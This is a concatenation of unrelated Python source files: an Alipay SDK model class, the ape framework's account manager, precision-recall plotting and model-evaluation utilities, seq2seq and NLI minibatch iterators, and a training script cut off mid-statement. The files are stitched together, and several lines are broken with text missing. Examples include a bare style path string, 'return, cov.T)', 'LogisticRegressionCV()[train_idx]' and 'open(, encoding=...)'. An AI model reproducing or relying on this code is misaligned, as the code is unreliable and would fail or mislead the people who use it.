<gh_stars>100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- from .event import * from .backtest_event_engine import * from .live_event_engine import *
<reponame>antopen/alipay-sdk-python-all<gh_stars>100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class MultiStagePayLineInfo(object): def __init__(self): self._payment_amount = None self._payment_idx = None @property def payment_amount(self): return self._payment_amount @payment_amount.setter def payment_amount(self, value): self._payment_amount = value @property def payment_idx(self): return self._payment_idx @payment_idx.setter def payment_idx(self, value): self._payment_idx = value def to_alipay_dict(self): params = dict() if self.payment_amount: if hasattr(self.payment_amount, 'to_alipay_dict'): params['payment_amount'] = self.payment_amount.to_alipay_dict() else: params['payment_amount'] = self.payment_amount if self.payment_idx: if hasattr(self.payment_idx, 'to_alipay_dict'): params['payment_idx'] = self.payment_idx.to_alipay_dict() else: params['payment_idx'] = self.payment_idx return params @staticmethod def from_alipay_dict(d): if not d: return None o = MultiStagePayLineInfo() if 'payment_amount' in d: o.payment_amount = d['payment_amount'] if 'payment_idx' in d: o.payment_idx = d['payment_idx'] return o
from typing import Dict, Iterator, List, Type from dataclassy import dataclass from pluggy import PluginManager # type: ignore from ape.api.accounts import AccountAPI, AccountContainerAPI, TestAccountAPI from ape.types import AddressType from ape.utils import cached_property, singledispatchmethod from .config import ConfigManager from .converters import ConversionManager from .networks import NetworkManager @dataclass class AccountManager: """ The ``AccountManager`` is a container of containers for :class:`~ape.api.accounts.AccountAPI` objects. All containers must subclass :class:`~ape.api.accounts.AccountContainerAPI` and are treated as singletons. Import the accounts manager singleton from the root ``ape`` namespace. Usage example:: from ape import accounts # "accounts" is the AccountManager singleton my_accounts = accounts.load("dev") """ config: ConfigManager converters: ConversionManager plugin_manager: PluginManager network_manager: NetworkManager @cached_property def containers(self) -> Dict[str, AccountContainerAPI]: """ The list of all :class:`~ape.api.accounts.AccountContainerAPI` instances across all installed plugins. Returns: dict[str, :class:`~ape.api.accounts.AccountContainerAPI`] """ containers = {} data_folder = self.config.DATA_FOLDER data_folder.mkdir(exist_ok=True) for plugin_name, (container_type, account_type) in self.plugin_manager.account_types: # Ignore containers that contain test accounts. if issubclass(account_type, TestAccountAPI): continue accounts_folder = data_folder / plugin_name accounts_folder.mkdir(exist_ok=True) containers[plugin_name] = container_type(accounts_folder, account_type, self.config) return containers @property def aliases(self) -> Iterator[str]: """ All account aliases from every account-related plugin. The "alias" is part of the :class:`~ape.api.accounts.AccountAPI`. Use the account alias to load an account using method :meth:`~ape.managers.accounts.AccountManager.load`. Returns: Iterator[str] """ for container in self.containers.values(): yield from container.aliases def get_accounts_by_type(self, type_: Type[AccountAPI]) -> List[AccountAPI]: """ Get a list of accounts by their type. Args: type_ (Type[:class:`~ape.api.accounts.AccountAPI`]): The type of account to get. Returns: List[:class:`~ape.api.accounts.AccountAPI`] """ accounts_with_type = [] for account in self: if isinstance(account, type_): self._inject_provider(account) accounts_with_type.append(account) return accounts_with_type def __len__(self) -> int: """ The number of accounts managed by all account plugins. Returns: int """ return sum(len(container) for container in self.containers.values()) def __iter__(self) -> Iterator[AccountAPI]: for container in self.containers.values(): for account in container: self._inject_provider(account) yield account def __repr__(self) -> str: return "[" + ", ".join(repr(a) for a in self) + "]" @cached_property def test_accounts(self) -> List[TestAccountAPI]: """ Accounts generated from the configured test mnemonic. These accounts are also the subject of a fixture available in the ``test`` plugin called ``accounts``. Configure these accounts, such as the mnemonic and / or number-of-accounts using the ``test`` section of the `ape-config.yaml` file. Usage example:: def test_my_contract(accounts): # The "accounts" fixture uses the AccountsManager.test_accounts() sender = accounts[0] receiver = accounts[1] ... Returns: List[:class:`~ape.api.accounts.TestAccountAPI`] """ accounts = [] for plugin_name, (container_type, account_type) in self.plugin_manager.account_types: if not issubclass(account_type, TestAccountAPI): continue container = container_type(None, account_type, self.config) for account in container: self._inject_provider(account) accounts.append(account) return accounts def load(self, alias: str) -> AccountAPI: """ Get an account by its alias. Raises: IndexError: When there is no local account with the given alias. Returns: :class:`~ape.api.accounts.AccountAPI` """ if alias == "": raise ValueError("Cannot use empty string as alias!") for account in self: if account.alias and account.alias == alias: self._inject_provider(account) return account raise IndexError(f"No account with alias '{alias}'.") @singledispatchmethod def __getitem__(self, account_id) -> AccountAPI: raise NotImplementedError(f"Cannot use {type(account_id)} as account ID.") @__getitem__.register def __getitem_int(self, account_id: int) -> AccountAPI: """ Get an account by index. For example, when you do the CLI command ``ape accounts list --all``, you will see a list of enumerated accounts by their indices. Use this method as a quicker, ad-hoc way to get an account from that index. **NOTE**: It is generally preferred to use :meth:`~ape.managers.accounts.AccountManager.load` or :meth:`~ape.managers.accounts.AccountManager.__getitem_str`. Returns: :class:`~ape.api.accounts.AccountAPI` """ for idx, account in enumerate(self.__iter__()): if account_id == idx: self._inject_provider(account) return account raise IndexError(f"No account at index '{account_id}'.") @__getitem__.register def __getitem_str(self, account_str: str) -> AccountAPI: """ Get an account by address. Raises: IndexError: When there is no local account with the given address. Returns: :class:`~ape.api.accounts.AccountAPI` """ account_id = self.converters.convert(account_str, AddressType) for container in self.containers.values(): if account_id in container: account = container[account_id] self._inject_provider(account) return account raise IndexError(f"No account with address '{account_id}'.") def __contains__(self, address: AddressType) -> bool: """ Determine if the given address matches an account in ``ape``. Args: address (:class:`~ape.types.AddressType`): The address to check. Returns: bool: ``True`` when the given address is found. """ return any(address in container for container in self.containers.values()) def _inject_provider(self, account: AccountAPI): if self.network_manager.active_provider is not None: account.provider = self.network_manager.active_provider
<gh_stars>100-1000 from copy import copy from collections import OrderedDict import numpy as np import pandas as pd from sklearn.metrics import average_precision_score, auc, roc_auc_score from sklearn.metrics import precision_recall_curve from sklearn.linear_model import LogisticRegressionCV from sklearn.cross_validation import StratifiedShuffleSplit import matplotlib.pyplot as plt import matplotlib from IPython.display import display, HTML'../../src/roam.mplstyle') def generate_data_and_constant_predictions(n, frac_positive): """ Generates data in a fixed positive:negative ratio, and returns the data and scores from a dummy model that predicts 0.5 for all examples. Parameters ---------- n : int Number of examples frac_positive : float Fraction of the examples that are positive Returns ------- observations : list Consisting of (frac_positive * n) 1s, and (n - (frac_positive * n)) 0s constant_predictions : list Same length as observations """ n_positive = int(frac_positive * n) n_negative = n - n_positive observations = [1 for _ in range(n_positive)] + \ [0 for _ in range(n_negative)] constant_predictions = [0.5 for _ in range(n_positive + n_negative)] return observations, constant_predictions def plot_recall_precision_from_predictions(true, scores, **kwargs): """ Computes precision and recall from some observations and scores assigned to them, and plots a precision-recall curve. Parameters ---------- true : list Must be binary (i.e. 1s and 0s). scores : list Consisting of floats. kwargs : optional See plot_axes. """ p, r, thresholds = precision_recall_curve(true, scores) plot_recall_precision(p, r, **kwargs) def plot_recall_precision(p, r, **kwargs): """ Plots a precision-recall graph from a series of operating points. Parameters ---------- p : list Precision. r : recall Recall. kwargs : optional See plot_axes. Returns ------- """ fig, ax = plt.subplots(1, 1, figsize=(7, 4)) plot_axes(ax, p, r, legend_text='IAP', **kwargs) def plot_axes( ax, y, x, interpolation=None, marker_size=30, title=None, legend_text='Area'): """ Plots a graph on axes provided. Parameters ---------- ax : matplotlib axes y : list x : list interpolation : None (default) or string ['linear', 'step'] marker_size : float (default: 30) title : None or string legend_text : string (default: 'Area') Text to include on the legend before showing the area. Only used if interpolation is not None. """ ax.scatter(x, y, marker='o', linewidths=0, s=marker_size, clip_on=False) # Show first and last points more visably ax.scatter([x[i] for i in [0, -1]], [y[i] for i in [0, -1]], marker='x', linewidths=2, s=100, clip_on=False) ax.set_xlim((-0.05, 1.05)) ax.set_ylim((-0.08, 1.08)) ax.set_xlabel('Recall') ax.set_ylabel('Precision') if title is not None: ax.set_title(title, fontsize=20) if interpolation is not None: if interpolation == 'linear': ax.plot(x, y) area = auc(x, y) ax.fill_between(x, 0, y, alpha=0.2, label='{} = {:5.4f}'.format(legend_text, area)) leg = ax.legend() leg.get_frame().set_linewidth(0.0) elif interpolation == 'step': p_long = [v for v in y for _ in (0, 1)][:-1] r_long = [v for v in x for _ in (0, 1)][1:] ax.plot(r_long, p_long) area = auc_using_step(x, y) ax.fill_between(r_long, 0, p_long, alpha=0.2, label='{} = {:5.4f}'.format(legend_text, area)) leg = ax.legend() leg.get_frame().set_linewidth(0.0) else: print("Interpolation value of '{}' not recognised. " "Choose from 'linear', 'quadrature'.".format(interpolation)) def compare_recall_precisions_from_predictions(true, score_dict, **kwargs): """ Show two graphs side-by-side for two different sets of scores, against the same true observations. Parameters ---------- true : list score_dict : dict Consisting of `{name: scores}` where `name` is a string and `scores` is a list of floats. kwargs : optional See plot_axes. """ pr = OrderedDict() for name, score in score_dict.items(): p, r, threshold = precision_recall_curve(true, score) pr[name] = [p, r] compare_recall_precision_graph(pr, **kwargs) def compare_recall_precision_graph(pr_dict, title=None, **kwargs): """ Parameters ---------- pr_dict : dict Consisting of `{name: pr}` where `name` is a string and `pr` is a tuple of precision and recall values. title : string kwargs : optional See plot_axes. """ fig, ax = plt.subplots(1, 2, figsize=(15, 4)) for side, (name, [p, r]) in enumerate(pr_dict.items()): plot_axes(ax[side], p, r, title=name, legend_text='IAP', **kwargs) if title is not None: fig.suptitle(title, fontsize=20, y=1.05) def operating_points(ranking): """ Computes lists of precision and recall from an ordered list of observations. Parameters ---------- ranking : list Entries should be binary (0 or 1) and in descending order (i.e. top-ranked is first). Returns ------- precision : list recall : list """ precision, recall = list(), list() for pos in range(len(ranking)): p, r = precision_recall_from_ranking(ranking, pos) precision.append(p) recall.append(r) return precision, recall def precision_recall_from_ranking(ranking, position): """ Computes the precision and recall of a particular assignment of labelled observations to a positive and negative class, where the positive class comes first in the list, and the negative class comes second, and the split point is specified. Parameters ---------- ranking : list Ordered list of binary observations. position : int Position to split the list into positive and negative. Returns ------- precision : float recall : float """ if position == 0: precision = 1.0 recall = 0.0 else: ranking = np.array(ranking) precision = (ranking[:position] == 1).sum() / position recall = (ranking[:position] == 1).sum() / (ranking == 1).sum() return precision, recall def auc_using_step(recall, precision): return sum([(recall[i] - recall[i+1]) * precision[i] for i in range(len(recall) - 1)]) def roam_average_precision(y_true, y_score, sample_weight=None): precision, recall, thresholds = precision_recall_curve( y_true, y_score, sample_weight=sample_weight) return auc_using_step(recall, precision) def generate_positive_semi_definite_matrix(n_dim): """ Creates a positive semi-definite matrix. Parameters ---------- n_dim : int Returns ------- np.array : (n_dim, n_dim) """ cov = np.random.randn(n_dim, n_dim) return, cov.T) def subsample(X, y, frac_positive): """ Subsamples a feature matrix and target vector to ensure that a specified fraction of the target values are positive. Parameters ---------- X : np.array (n, m) y : np.array (n, ) frac_positive : float Returns ------- X : np.array (n', m) Some subset of the rows of the input X (i.e. n' <= n) y : np.array (n', ) Some subset of the rows of the input y (i.e. n' <= n) """ positive_idx = np.arange(len(y))[y == 1] negative_idx = np.arange(len(y))[y == 0] num_positive = int(frac_positive * len(negative_idx)) positive_idx = np.random.choice(positive_idx, size=num_positive, replace=False) indices_to_use = np.concatenate([positive_idx, negative_idx]) np.random.shuffle(indices_to_use) return X[indices_to_use], y[indices_to_use] def generate_continuous_data_and_targets( n_dim, n_samples, mixing_factor=0.025, frac_positive=0.1): """ Generates a multivariate Gaussian-distributed dataset and a response variable that is conditioned on a weighted sum of the data. Parameters ---------- n_dim : int n_samples : int mixing_factor : float 'Squashes' the weighted sum into the linear regime of a sigmoid. Smaller numbers squash closer to 0.5. Returns ------- X : np.array (n_samples, n_dim) y : np.array (n_samples, ) """ cov = generate_positive_semi_definite_matrix(n_dim) X = np.random.multivariate_normal( mean=np.zeros(n_dim), cov=cov, size=n_samples) weights = np.random.randn(n_dim) y_probs = sigmoid(mixing_factor *, weights)) y = np.random.binomial(1, p=y_probs) X, y = subsample(X, y, frac_positive) return X, y def sigmoid(x): """ Computes sigmoid(x) for some activation x. Parameters ---------- x : float Returns ------- sigmoid(x) : float """ return 1 / (1 + np.exp(-x)) def train_model_and_evaluate(n_dim=50, n_samples=10000, frac_positive=0.05, mixing_factor=0.025): """ Generates some data and trains a logistic regression model. Parameters ---------- n_dim : int Number of dimensions for the training data. n_samples : int Number of observations. frac_positive : float mixing_factor : float Numbers nearer to 0 make the task more challenging. Returns ------- y : np.array (n_test, ) True observed values in the test set. y_scores : np.array (n_test, ) Model predictions of the test samples. roc_auc : float ROC AUC score on the test data """ X, y = generate_continuous_data_and_targets( n_dim=n_dim, n_samples=n_samples, frac_positive=frac_positive, mixing_factor=mixing_factor) splits = StratifiedShuffleSplit(y, test_size=0.3, random_state=42) train_idx, test_idx = list(splits)[0] lr = LogisticRegressionCV()[train_idx], y[train_idx]) y_scores = lr.predict_proba(X[test_idx])[:, 1] roc_auc = roc_auc_score(y[test_idx], y_scores) return y[test_idx], y_scores, roc_auc
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. """Minibatching utilities.""" import itertools import operator import os import pickle import numpy as np import torch from sklearn.utils import shuffle from torch.autograd import Variable # Change to python3+. # from itertools import zip class DataIterator(object): """Data Iterator.""" @staticmethod def _trim_vocab(vocab, vocab_size): """Discard start, end, pad and unk tokens if already present. Args: vocab(list): Vocabulary. vocab_size(int): The size of the vocabulary. Returns: word2id(list): Word to index list. id2word(list): Index to word list. """ if "<s>" in vocab: del vocab["<s>"] if "<pad>" in vocab: del vocab["<pad>"] if "</s>" in vocab: del vocab["</s>"] if "<unk>" in vocab: del vocab["<unk>"] word2id = {"<s>": 0, "<pad>": 1, "</s>": 2, "<unk>": 3} id2word = {0: "<s>", 1: "<pad>", 2: "</s>", 3: "<unk>"} sorted_word2id = sorted( vocab.items(), key=operator.itemgetter(1), reverse=True ) if vocab_size != -1: sorted_words = [x[0] for x in sorted_word2id[:vocab_size]] else: sorted_words = [x[0] for x in sorted_word2id] for ind, word in enumerate(sorted_words): word2id[word] = ind + 4 for ind, word in enumerate(sorted_words): id2word[ind + 4] = word return word2id, id2word def construct_vocab( self, sentences, vocab_size, lowercase=False, charlevel=False ): """Create vocabulary. Args: sentences(list): The list of sentences. vocab_size(int): The size of vocabulary. lowercase(bool): If lowercase the sentences. charlevel(bool): If need to split the sentence with space. Returns: word2id(list): Word to index list. id2word(list): Index to word list. """ vocab = {} for sentence in sentences: if isinstance(sentence, str): if lowercase: sentence = sentence.lower() if not charlevel: sentence = sentence.split() for word in sentence: if word not in vocab: vocab[word] = 1 else: vocab[word] += 1 word2id, id2word = self._trim_vocab(vocab, vocab_size) return word2id, id2word class BufferedDataIterator(DataIterator): """Multi Parallel corpus data iterator.""" def __init__( self, src, trg, src_vocab_size, trg_vocab_size, tasknames, save_dir, buffer_size=1e6, lowercase=False, seed=0, ): """Initialize params. Args: src(list): source dataset. trg(list): target dataset. src_vocab_size(int): The size of source vocab. trg_vocab_size(int): The size of target vocab. tasknames(list): The list of task names. save_dir(str): The saving dir. buffer_size(float): Buffer size. lowercase(bool): if lowercase the data. """ self.seed = seed self.fname_src = src self.fname_trg = trg self.src_vocab_size = src_vocab_size self.trg_vocab_size = trg_vocab_size self.tasknames = tasknames self.save_dir = save_dir self.buffer_size = buffer_size self.lowercase = lowercase # Open a list of file pointers to all the files. self.f_src = [ open(fname, "r", encoding="utf-8") for fname in self.fname_src ] self.f_trg = [ open(fname, "r", encoding="utf-8") for fname in self.fname_trg ] # Initialize dictionaries that contain sentences & word mapping dicts self.src = [ {"data": [], "word2id": None, "id2word": None} for i in range(len(self.fname_src)) ] self.trg = [ {"data": [], "word2id": None, "id2word": None} for i in range(len(self.fname_trg)) ] self.build_vocab() """Reset file pointers to the start after reading the file to build vocabularies.""" for idx in range(len(self.src)): self._reset_filepointer(idx) for idx in range(len(self.src)): self.fetch_buffer(idx) def _reset_filepointer(self, idx): """Reset file pointer. Args: idx(int): Index used to reset file pointer. """ self.f_src[idx] = open(self.fname_src[idx], "r", encoding="utf-8") self.f_trg[idx] = open(self.fname_trg[idx], "r", encoding="utf-8") def fetch_buffer(self, idx, reset=True): """Fetch sentences from the file into the buffer. Args: idx(int): Index used to fetch the sentences. reset(bool): If need to reset the contents of the current buffer. """ # Reset the contents of the current buffer. if reset: self.src[idx]["data"] = [] self.trg[idx]["data"] = [] # Populate buffer for src, trg in zip(self.f_src[idx], self.f_trg[idx]): if len(self.src[idx]["data"]) == self.buffer_size: break if self.lowercase: self.src[idx]["data"].append(src.lower().split()) self.trg[idx]["data"].append(trg.lower().split()) else: self.src[idx]["data"].append(src.split()) self.trg[idx]["data"].append(trg.split()) # Sort sentences by decreasing length (hacky bucketing) self.src[idx]["data"], self.trg[idx]["data"] = zip( *sorted( zip(self.src[idx]["data"], self.trg[idx]["data"]), key=lambda x: len(x[0]), reverse=True, ) ) """If buffer isn't full after reading the contents of the file, cycle around. """ if len(self.src[idx]["data"]) < self.buffer_size: assert len(self.src[idx]["data"]) == len(self.trg[idx]["data"]) # Cast things to list to avoid issue with calling .append above self.src[idx]["data"] = list(self.src[idx]["data"]) self.trg[idx]["data"] = list(self.trg[idx]["data"]) self._reset_filepointer(idx) self.fetch_buffer(idx, reset=False) def build_vocab(self): """Build a memory efficient vocab.""" # Construct common source vocab. # Check if save directory exists. if not os.path.exists(self.save_dir): raise ValueError("Could not find save dir : %s" % self.save_dir) # Check if a cached vocab file exists. if os.path.exists(os.path.join(self.save_dir, "src_vocab.pkl")): vocab = pickle.load( open(os.path.join(self.save_dir, "src_vocab.pkl"), "rb") ) word2id, id2word = vocab["word2id"], vocab["id2word"] # If not, compute the vocab from scratch and store a cache. else: word2id, id2word = self.construct_vocab( itertools.chain.from_iterable(self.f_src), self.src_vocab_size, self.lowercase, ) pickle.dump( {"word2id": word2id, "id2word": id2word}, open(os.path.join(self.save_dir, "src_vocab.pkl"), "wb"), ) for corpus in self.src: corpus["word2id"], corpus["id2word"] = word2id, id2word # Do the same for the target vocabulary. if os.path.exists(os.path.join(self.save_dir, "trg_vocab.pkl")): vocab = pickle.load( open(os.path.join(self.save_dir, "trg_vocab.pkl"), "rb") ) for idx, (corpus, fname) in enumerate(zip(self.trg, self.f_trg)): word2id, id2word = ( vocab[self.tasknames[idx]]["word2id"], vocab[self.tasknames[idx]]["id2word"], ) corpus["word2id"], corpus["id2word"] = word2id, id2word else: trg_vocab_dump = {} for idx, (corpus, fname) in enumerate(zip(self.trg, self.f_trg)): word2id, id2word = self.construct_vocab( fname, self.trg_vocab_size, self.lowercase ) corpus["word2id"], corpus["id2word"] = word2id, id2word trg_vocab_dump[self.tasknames[idx]] = {} trg_vocab_dump[self.tasknames[idx]]["word2id"] = word2id trg_vocab_dump[self.tasknames[idx]]["id2word"] = id2word pickle.dump( trg_vocab_dump, open(os.path.join(self.save_dir, "trg_vocab.pkl"), "wb"), ) def shuffle_dataset(self, idx): """Shuffle current buffer.""" self.src[idx]["data"], self.trg[idx]["data"] = shuffle( self.src[idx]["data"], self.trg[idx]["data"], random_state=self.seed, ) def get_parallel_minibatch( self, corpus_idx, index, batch_size, max_len_src, max_len_trg ): """Prepare minibatch. Args: corpus_idx(int): Corpus Index. index(int): Index. batch_size(int): Batch Size. max_len_src(int): Max length for resource. max_len_trg(int): Max length ofr target. Returns: minibatch of src-trg pairs(dict). """ src_lines = [ ["<s>"] + line[: max_len_src - 2] + ["</s>"] for line in self.src[corpus_idx]["data"][ index : index + batch_size ] ] trg_lines = [ ["<s>"] + line[: max_len_trg - 2] + ["</s>"] for line in self.trg[corpus_idx]["data"][ index : index + batch_size ] ] """Sort sentences by decreasing length within a minibatch for `torch.nn.utils.packed_padded_sequence`""" src_lens = [len(line) for line in src_lines] sorted_indices = np.argsort(src_lens)[::-1] sorted_src_lines = [src_lines[idx] for idx in sorted_indices] sorted_trg_lines = [trg_lines[idx] for idx in sorted_indices] sorted_src_lens = [len(line) for line in sorted_src_lines] sorted_trg_lens = [len(line) for line in sorted_trg_lines] max_src_len = max(sorted_src_lens) max_trg_len = max(sorted_trg_lens) # Map words to indices input_lines_src = [ [ self.src[corpus_idx]["word2id"][w] if w in self.src[corpus_idx]["word2id"] else self.src[corpus_idx]["word2id"]["<unk>"] for w in line ] + [self.src[corpus_idx]["word2id"]["<pad>"]] * (max_src_len - len(line)) for line in sorted_src_lines ] input_lines_trg = [ [ self.trg[corpus_idx]["word2id"][w] if w in self.trg[corpus_idx]["word2id"] else self.trg[corpus_idx]["word2id"]["<unk>"] for w in line[:-1] ] + [self.trg[corpus_idx]["word2id"]["<pad>"]] * (max_trg_len - len(line)) for line in sorted_trg_lines ] output_lines_trg = [ [ self.trg[corpus_idx]["word2id"][w] if w in self.trg[corpus_idx]["word2id"] else self.trg[corpus_idx]["word2id"]["<unk>"] for w in line[1:] ] + [self.trg[corpus_idx]["word2id"]["<pad>"]] * (max_trg_len - len(line)) for line in sorted_trg_lines ] # Cast lists to torch tensors input_lines_src = Variable(torch.LongTensor(input_lines_src)).cuda() input_lines_trg = Variable(torch.LongTensor(input_lines_trg)).cuda() output_lines_trg = Variable(torch.LongTensor(output_lines_trg)).cuda() sorted_src_lens = ( Variable(torch.LongTensor(sorted_src_lens), volatile=True) .squeeze() .cuda() ) # Return minibatch of src-trg pairs return { "input_src": input_lines_src, "input_trg": input_lines_trg, "output_trg": output_lines_trg, "src_lens": sorted_src_lens, "type": "seq2seq", } class NLIIterator(DataIterator): """Data iterator for tokenized NLI datasets.""" def __init__( self, train, dev, test, vocab_size, lowercase=True, vocab=None, seed=0 ): """Initialize params. Each of train/dev/test is a tab-separate file of the form premise \t hypothesis \t label. Args: train(torch.Tensor): Training dataset. dev(torch.Tensor): Validation dataset. test(torch.Tensor): Testing dataset. vocab_size(int): The size of the vocabulary. lowercase(bool): If lowercase the dataset. vocab(Union[bytes,str): The list of the vocabulary. """ self.seed = seed self.train = train = dev self.test = test self.vocab_size = vocab_size self.lowercase = lowercase self.vocab = vocab self.train_lines = [ line.strip().lower().split("\t") for line in open(self.train, encoding="utf-8") ] self.dev_lines = [ line.strip().lower().split("\t") for line in open(, encoding="utf-8") ] self.test_lines = [ line.strip().lower().split("\t") for line in open(self.test, encoding="utf-8") ] if self.vocab is not None: # binary mode doesn't take an encoding argument self.vocab = pickle.load(open(self.vocab, "rb")) self.word2id = self.vocab["word2id"] self.id2word = self.vocab["id2word"] self.vocab_size = len(self.word2id) else: self.word2id, self.id2word = self.construct_vocab( [x[0] for x in self.train_lines] + [x[1] for x in self.train_lines], self.vocab_size, lowercase=self.lowercase, ) # Label text to class mapping. self.text2label = {"entailment": 0, "neutral": 1, "contradiction": 2} self.shuffle_dataset() def shuffle_dataset(self): """Shuffle training data.""" self.train_lines = shuffle(self.train_lines, random_state=self.seed) def get_parallel_minibatch(self, index, batch_size, sent_type="train"): """Prepare minibatch. Args: index(int): The index for line. batch_size(int): Batch size. sent_type(str): Type of dataset. Returns: dict for batch training. """ if sent_type == "train": lines = self.train_lines elif sent_type == "dev": lines = self.dev_lines else: lines = self.test_lines sent1 = [ ["<s>"] + line[0].split() + ["</s>"] for line in lines[index : index + batch_size] ] sent2 = [ ["<s>"] + line[1].split() + ["</s>"] for line in lines[index : index + batch_size] ] labels = [ self.text2label[line[2]] for line in lines[index : index + batch_size] ] sent1_lens = [len(line) for line in sent1] sorted_sent1_indices = np.argsort(sent1_lens)[::-1] sorted_sent1_lines = [sent1[idx] for idx in sorted_sent1_indices] rev_sent1 = np.argsort(sorted_sent1_indices) sent2_lens = [len(line) for line in sent2] sorted_sent2_indices = np.argsort(sent2_lens)[::-1] sorted_sent2_lines = [sent2[idx] for idx in sorted_sent2_indices] rev_sent2 = np.argsort(sorted_sent2_indices) sorted_sent1_lens = [len(line) for line in sorted_sent1_lines] sorted_sent2_lens = [len(line) for line in sorted_sent2_lines] max_sent1_len = max(sorted_sent1_lens) max_sent2_len = max(sorted_sent2_lens) sent1 = [ [ self.word2id[w] if w in self.word2id else self.word2id["<unk>"] for w in line ] + [self.word2id["<pad>"]] * (max_sent1_len - len(line)) for line in sorted_sent1_lines ] sent2 = [ [ self.word2id[w] if w in self.word2id else self.word2id["<unk>"] for w in line ] + [self.word2id["<pad>"]] * (max_sent2_len - len(line)) for line in sorted_sent2_lines ] sent1 = Variable(torch.LongTensor(sent1)).cuda() sent2 = Variable(torch.LongTensor(sent2)).cuda() labels = Variable(torch.LongTensor(labels)).cuda() sent1_lens = ( Variable(torch.LongTensor(sorted_sent1_lens), requires_grad=False) .squeeze() .cuda() ) sent2_lens = ( Variable(torch.LongTensor(sorted_sent2_lens), requires_grad=False) .squeeze() .cuda() ) rev_sent1 = ( Variable(torch.LongTensor(rev_sent1), requires_grad=False) .squeeze() .cuda() ) rev_sent2 = ( Variable(torch.LongTensor(rev_sent2), requires_grad=False) .squeeze() .cuda() ) return { "sent1": sent1, "sent2": sent2, "sent1_lens": sent1_lens, "sent2_lens": sent2_lens, "rev_sent1": rev_sent1, "rev_sent2": rev_sent2, "labels": labels, "type": "nli", } def get_validation_minibatch( src, trg, index, batch_size, src_word2id, trg_word2id ): """Prepare minibatch. Args: src(list): source data. trg(list): target data. index(int): index for the file. batch_size(int): batch size. src_word2id(list): Word to index for source. trg_word2id(list): Word to index for target. Returns: Dict for seq2seq model. """ src_lines = [ ["<s>"] + line + ["</s>"] for line in src[index : index + batch_size] ] trg_lines = [ ["<s>"] + line + ["</s>"] for line in trg[index : index + batch_size] ] src_lens = [len(line) for line in src_lines] sorted_indices = np.argsort(src_lens)[::-1] sorted_src_lines = [src_lines[idx] for idx in sorted_indices] sorted_trg_lines = [trg_lines[idx] for idx in sorted_indices] sorted_src_lens = [len(line) for line in sorted_src_lines] sorted_trg_lens = [len(line) for line in sorted_trg_lines] max_src_len = max(sorted_src_lens) max_trg_len = max(sorted_trg_lens) input_lines_src = [ [src_word2id[w] if w in src else src_word2id["<unk>"] for w in line] + [src_word2id["<pad>"]] * (max_src_len - len(line)) for line in sorted_src_lines ] input_lines_trg = [ [ trg_word2id[w] if w in trg_word2id else trg_word2id["<unk>"] for w in line[:-1] ] + [trg_word2id["<pad>"]] * (max_trg_len - len(line)) for line in sorted_trg_lines ] output_lines_trg = [ [ trg_word2id[w] if w in trg_word2id else trg_word2id["<unk>"] for w in line[1:] ] + [trg_word2id["<pad>"]] * (max_trg_len - len(line)) for line in sorted_trg_lines ] # For pytroch 0.4 with torch.no_grad(): input_lines_src = Variable(torch.LongTensor(input_lines_src)).cuda() input_lines_trg = Variable(torch.LongTensor(input_lines_trg)).cuda() output_lines_trg = Variable(torch.LongTensor(output_lines_trg)).cuda() # sorted_src_lens = Variable( # torch.LongTensor(sorted_src_lens) # ).squeeze().cuda() sorted_src_lens = ( Variable(torch.LongTensor(sorted_src_lens)) .view(len(sorted_src_lens)) .cuda() ) return { "input_src": input_lines_src, "input_trg": input_lines_trg, "output_trg": output_lines_trg, "src_lens": sorted_src_lens, "type": "seq2seq", } def compute_validation_loss( config, model, train_iterator, criterion, task_idx, lowercase=False ): """Compute validation loss for a task. Args: config(dict): configuration list. model(MultitaskModel): model. train_iterator(BufferedDataIterator): Multi Parallel corpus data iterator. criterion(nn.CrossEntropyLoss): criterion function for loss. task_idx(int): Task index. lowercase(bool): If lowercase the data. Returns: float as the mean of the loss. """ val_src = config["data"]["paths"][task_idx]["val_src"] val_trg = config["data"]["paths"][task_idx]["val_trg"] if lowercase: val_src = [ line.strip().lower().split() for line in open(val_src, "r", encoding="utf-8") ] val_trg = [ line.strip().lower().split() for line in open(val_trg, "r", encoding="utf-8") ] else: val_src = [ line.strip().split() for line in open(val_src, "r", encoding="utf-8") ] val_trg = [ line.strip().split() for line in open(val_trg, "r", encoding="utf-8") ] batch_size = config["training"]["batch_size"] losses = [] for j in range(0, len(val_src), batch_size): minibatch = get_validation_minibatch( val_src, val_trg, j, batch_size, train_iterator.src[task_idx]["word2id"], train_iterator.trg[task_idx]["word2id"], ) decoder_logit = model(minibatch, task_idx) loss = criterion( decoder_logit.contiguous().view(-1, decoder_logit.size(2)), minibatch["output_trg"].contiguous().view(-1), ) # losses.append([0]) losses.append(loss.item()) return np.mean(losses) # Original source:
<filename>paragraph_encoder/ import torch import numpy as np import json import os import pickle import sys import logging import shutil from tqdm import tqdm from torch.autograd import Variable import torch.optim as optim import torch.nn.functional as F from import RandomSampler import config from model import utils, data, vector from model.retriever import LSTMRetriever from multi_corpus import MultiCorpus from import SequentialSampler, RandomSampler import math logger = logging.getLogger() global_timer = utils.Timer() stats = {'timer': global_timer, 'epoch': 0, 'best_valid': 0, 'best_verified_valid': 0, 'best_acc': 0, 'best_verified_acc': 0} def make_data_loader(args, corpus, train_time=False): dataset = data.MultiCorpusDataset( args, corpus, args.word_dict, args.feature_dict, single_answer=False, para_mode=args.para_mode, train_time=train_time ) sampler = SequentialSampler(dataset) if not train_time else RandomSampler(dataset) loader = dataset, batch_size=args.batch_size, sampler=sampler, num_workers=args.data_workers, collate_fn=vector.batchify(args, args.para_mode, train_time=train_time), pin_memory=True ) return loader def init_from_checkpoint(args):'Loading model from saved checkpoint {}'.format(args.pretrained)) model = torch.load(args.pretrained) word_dict = model['word_dict'] feature_dict = model['feature_dict'] args.vocab_size = len(word_dict) args.embedding_dim_orig = args.embedding_dim args.word_dict = word_dict args.feature_dict = feature_dict ret = LSTMRetriever(args, word_dict, feature_dict) # load saved param values ret.model.load_state_dict(model['state_dict']['para_clf']) optimizer = None parameters = ret.get_trainable_params() if args.optimizer == 'sgd': optimizer = optim.SGD(parameters, args.learning_rate, momentum=args.momentum, weight_decay=args.weight_decay) elif args.optimizer == 'adamax': optimizer = optim.Adamax(parameters, weight_decay=args.weight_decay) elif args.optimizer == 'nag': optimizer = NAG(parameters, args.learning_rate, momentum=args.momentum, weight_decay=args.weight_decay) else: raise RuntimeError('Unsupported optimizer: %s' % 